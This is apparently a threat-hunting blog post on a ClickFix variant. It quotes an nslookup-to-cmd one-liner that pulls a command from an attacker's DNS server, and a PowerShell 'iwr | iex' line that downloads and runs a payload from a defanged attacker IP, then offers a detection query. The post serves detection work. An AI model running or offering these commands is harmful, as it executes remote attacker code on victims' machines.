375. The New ClickFix Variant: Do We Really Need To Detect It?

Hello everyone!

Variants of the Malicious Copy and Paste technique (T1204.004) continue to remain popular among attackers. Today, we’ll look at another example and examine whether it actually affects our detection capabilities.

This particular variant was shared by researchers from Microsoft Threat Intelligence. The command that the victim is prompted to execute performs a DNS query to an attacker-controlled server and parses the Name: field from the response:

cmd /c "nslookup example.com 84.21.189[.]20 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1

Despite the originality of the approach, the Name: field contains a fairly ordinary command:

powershell.exe -ep bypass -w h -c "iwr hxxp://64.227.40[.]197/o -useb | iex"

As you can see, there is nothing particularly novel here, and you could search for similar activity, for example, like this:

event_type: "processcreatewin"

AND

proc_file_path: "powershell.exe"

AND

cmdline: ("iwr" AND "iex")

See you soon!

Comments

Popular posts from this blog

082. Huniting for Malicious Browser Extensions

033. Free Google Threat Intelligence Course

068. Detecting RMMs from Ransomware Affiliate's Toolkit: MeshAgent